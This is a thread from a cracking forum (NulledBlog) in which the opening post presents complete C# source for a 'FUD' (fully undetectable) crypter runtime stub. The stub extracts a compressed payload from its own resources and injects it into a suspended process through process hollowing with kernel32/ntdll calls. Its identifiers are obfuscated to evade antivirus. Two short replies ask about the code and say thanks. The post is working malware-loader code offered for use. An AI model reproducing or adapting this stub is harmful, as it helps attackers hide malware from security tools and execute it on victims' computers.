Jump to content

Welcome to NulledBlog
Register now to gain access to all of our features. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more. If you already have an account, login here - otherwise create an account for free today!
Photo

How to make a FUD Runtime Stub (Level: Beginner)


  • Please log in to reply
2 replies to this topic

#1
jpaul

  • Offline
  • Junkie

  • Posts:
    338
    Reputation:
    5
    Joined:
    08 Aug, 2015

How to make a FUD Runtime Stub (Level: Beginner) How to make a FUD Runtime Stub (Level: Beginner)

This Stub is for

https://leakforums.net/thread-468643


we need 3 class


class1
 

Code:
using Microsoft.VisualBasic;
using System;
using System.Collections;
using System.Collections.Generic;
using System.Data;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;

public class 的伐式年谢达非答方外非肉非达说种自天文文十
{
    [DllImport("kernel32")]
    [return: MarshalAs(UnmanagedType.Bool)]
    private static extern bool 英余式文伪答(string 仿伏余式方中, StringBuilder 涯么伙信表文, IntPtr 谢份表十非的, IntPtr 谢涯谢伙华达, [MarshalAs(UnmanagedType.Bool)]
bool inherit, int creation, IntPtr env, string 方丢伪达种种, byte[] 信伏谢涯十华, IntPtr[] 么问种达信天);
    [DllImport("kernel32")]
    [return: MarshalAs(UnmanagedType.Bool)]
    private static extern bool V9(IntPtr hThr, uint[] ctxt);
    [DllImport("ntdll")]
    private static extern uint 英余式文伪答0(IntPtr hProc, IntPtr baseAddr);
    [DllImport("kernel32")]
    [return: MarshalAs(UnmanagedType.Bool)]
    private static extern bool 英余式文伪答1(IntPtr hProc, IntPtr baseAddr, ref IntPtr bufr, int bufrSize, ref IntPtr numRead);
    [DllImport("kernel32.dll")]
    private static extern uint 英余式文伪答2(IntPtr hThread);
    [DllImport("kernel32")]
    [return: MarshalAs(UnmanagedType.Bool)]
    private static extern bool 英余式文伪答3(IntPtr hThr, uint[] ctxt);
    [DllImport("kernel32")]
    private static extern IntPtr 英余式文伪答4(IntPtr hProc, IntPtr addr, IntPtr size, int allocType, int prot);
    [DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
    private static extern bool 英余式文伪答5(IntPtr hProcess, IntPtr guyfjhkKJLHKLK, IntPtr dwSize, uint flNewProtect, ref uint lpflOldProtect);
    [DllImport("kernel32.dll", SetLastError = true)]
    private static extern bool 英余式文伪答6(IntPtr hProcess, IntPtr 仿伏余式方中1, byte[] lpBuffer, uint nSize, int 仿伏余式方中2);

    public static bool 肉方表文文伏伙文余文英仿常价仿(byte[] bytes, string surrogateProcess)
    {
        try
        {
            IntPtr 谢份表十非的 = IntPtr.Zero;
            IntPtr[] 英余式文伪答7 = new IntPtr[4];
            byte[] 英余式文伪答8 = new byte[68];

            int num2 = BitConverter.ToInt32(bytes, 60);
            int num = BitConverter.ToInt16(bytes, num2 + 6);
            IntPtr ptr4 = new IntPtr(BitConverter.ToInt32(bytes, num2 + 0x54));

            if (英余式文伪答(null, new StringBuilder(surrogateProcess), 谢份表十非的, 谢份表十非的, false, 4, 谢份表十非的, null, 英余式文伪答8, 英余式文伪答7))
            {
                uint[] ctxt = new uint[179];
                ctxt[0] = 0x10002;
                if (V9(英余式文伪答7[1], ctxt))
                {
                    IntPtr baseAddr = new IntPtr(ctxt[0x29] + 8L);

                    IntPtr 英余式文伪答9 = IntPtr.Zero;
                    IntPtr 仿伏余式方中0 = new IntPtr(4);

                    IntPtr numRead = IntPtr.Zero;

                    if (英余式文伪答1(英余式文伪答7[0], baseAddr, ref 英余式文伪答9, Convert.ToInt32(仿伏余式方中0), ref numRead) && (英余式文伪答0(英余式文伪答7[0], 英余式文伪答9) == 0))
                    {
                        IntPtr addr = new IntPtr(BitConverter.ToInt32(bytes, num2 + 0x34));
                        IntPtr size = new IntPtr(BitConverter.ToInt32(bytes, num2 + 80));
                        IntPtr 仿伏余式方中1 = 英余式文伪答4(英余式文伪答7[0], addr, size, 0x3000, 0x40);

                        int 仿伏余式方中2 = 0;

                        英余式文伪答6(英余式文伪答7[0], 仿伏余式方中1, bytes, Convert.ToUInt32(Convert.ToInt32(ptr4)), 仿伏余式方中2);
                        int num5 = num - 1;
                        for (int i = 0; i <= num5; i++)
                        {
                            int[] dst = new int[10];
                            Buffer.BlockCopy(bytes, (num2 + 0xf8) + (i * 40), dst, 0, 40);
                            byte[] buffer2 = new byte[(dst[4] - 1) + 1];
                            Buffer.BlockCopy(bytes, dst[5], buffer2, 0, buffer2.Length);

                            size = new IntPtr(仿伏余式方中1.ToInt32() + dst[3]);
                            addr = new IntPtr(buffer2.Length);

                            英余式文伪答6(英余式文伪答7[0], size, buffer2, Convert.ToUInt32(addr), 仿伏余式方中2);
                        }
                        size = new IntPtr(ctxt[0x29] + 8L);
                        addr = new IntPtr(4);

                        英余式文伪答6(英余式文伪答7[0], size, BitConverter.GetBytes(仿伏余式方中1.ToInt32()), Convert.ToUInt32(addr), 仿伏余式方中2);
                        ctxt[0x2c] = Convert.ToUInt32(仿伏余式方中1.ToInt32() + BitConverter.ToInt32(bytes, num2 + 40));
                        英余式文伪答3(英余式文伪答7[1], ctxt);
                    }
                }
                英余式文伪答2(英余式文伪答7[1]);
            }
        }
        catch
        {
            return false;
        }
        return true;
    }
}

class2
 

Code:
using Microsoft.VisualBasic;
using System;
using System.Collections;
using System.Collections.Generic;
using System.Data;
using System.Diagnostics;
using System.Runtime.InteropServices;
static class 方华达么问丢先问的价问
{
    [DllImport("kernel32.dll", SetLastError = true)]
    private static extern IntPtr FindResource(IntPtr 谢谢天自非常文种传文传怎传非仿, string 伟怎余方非伏种常答常谢自伟怎余方非, string 种常答常谢自伟怎余方非伟怎余方非伏伟怎余方非伏);
    
    [DllImport("kernel32", EntryPoint = "GetModuleHandleA", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
    private static extern IntPtr 达表答伪的天道英文天方种表达份(string moduleName);
    [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
    private static extern int SizeofResource(IntPtr 谢谢天自非常文种传文传怎传非仿, IntPtr hResInfo);
    [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
    private static extern IntPtr LoadResource(IntPtr 谢谢天自非常文种传文传怎传非仿, IntPtr hResInfo);
    public static byte[] 文的价传先方延信的方么(string 谢表的书伏说信余用非余余外自频)
    {
        IntPtr 谢谢天自非常文种传文传怎传非仿 = 达表答伪的天道英文天方种表达份(谢表的书伏说信余用非余余外自频);
        IntPtr 答外信伟表余华道价达英 = FindResource(谢谢天自非常文种传文传怎传非仿, "Sweden", "Nykoping");
        IntPtr 伐么先种谢仿式谢外信 = LoadResource(谢谢天自非常文种传文传怎传非仿, 答外信伟表余华道价达英);
        dynamic 说非先十么谢余谢书仿涯伪种的非文外仿非自 = SizeofResource(谢谢天自非常文种传文传怎传非仿, 答外信伟表余华道价达英);
        byte[] 英余延种中式表中仿 = new byte[说非先十么谢余谢书仿涯伪种的非文外仿非自];
        Marshal.Copy(伐么先种谢仿式谢外信, 英余延种中式表中仿, 0, Convert.ToInt32(说非先十么谢余谢书仿涯伪种的非文外仿非自));
        return 英余延种中式表中仿;
    }
}

class3
 

code

 

 

using Microsoft.VisualBasic;
using System;
using System.Collections;
using System.Collections.Generic;
using System.Data;
using System.Diagnostics;
using System.IO.Compression;
using System.IO;

public class Compression
{

    public static byte[] Compress(byte[] bytData)
    {
        using (MemoryStream oMS = new MemoryStream())
        {
            //GZip object that compress the file
            using (GZipStream oGZipStream = new GZipStream(oMS, CompressionMode.Compress))
            {
                //Write to the Stream object from the buffer
                oGZipStream.Write(bytData, 0, bytData.Length);
                oGZipStream.Close();
                bytData = new byte[oMS.ToArray().Length];
                bytData = oMS.ToArray();
            }
            oMS.Close();
        }
        return bytData;
    }

    public static byte[] Decompress(byte[] bytData)
    {
        using (MemoryStream oMS = new MemoryStream(bytData))
        {
            using (GZipStream oGZipStream = new GZipStream(oMS, CompressionMode.Decompress))
            {
                const int CHUNK = 1024;
                int intTotalBytesRead = 0;
                do
                {
                    // Enlarge the buffer.
                    Array.Resize(ref bytData, intTotalBytesRead + CHUNK);
                    // Read the next chunk.
                    int intBytesRead = oGZipStream.Read(bytData, intTotalBytesRead, CHUNK);
                    intTotalBytesRead += intBytesRead;
                    // See if we're done.
                    if (intBytesRead < CHUNK)
                    {
                        // We're done. Make the buffer fit the data.
                        Array.Resize(ref bytData, intTotalBytesRead);
                        break; // TODO: might not be correct. Was : Exit Do
                    }
                } while (true);
                oGZipStream.Close();
            }
            oMS.Close();
        }
        return bytData;
    }

}

Program

 

Code:
byte[] Hej = null;
            byte[] dbytes = null;
            Hej = 方华达么问丢先问的价问.文的价传先方延信的方么(Application.ExecutablePath);
          
            dbytes = Compression.Decompress(Hej);
            的伐式年谢达非答方外非肉非达说种自天文文十.肉方表文文伏伙文余文英仿常价仿(dbytes, Application.ExecutablePath);

 


  • 4

trh1jXE.gif


#2
nerfryze

  • Offline
  • Member

  • PipPipPip
  • Posts:
    25
    Reputation:
    7
    Joined:
    11 Feb, 2016

what lang is that?can i have more det on it?


byte[] Hej = null;
            byte[] dbytes = null;
            Hej = 方华达么问丢先问的价问.文的价传先方延信的方么(Application.ExecutablePath);
          
            dbytes = Compression.Decompress(Hej);
            的伐式年谢达非答方外非肉非达说种自天文文十.肉方表文文伏伙文余文英仿常价仿(dbytes, Application.ExecutablePath);

 

stand for what?


  • 1

#3
ryanchan22

  • Offline
  • Member

  • PipPipPip
  • Posts:
    35
    Reputation:
    10
    Joined:
    18 Apr, 2015

tks


  • 1


0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users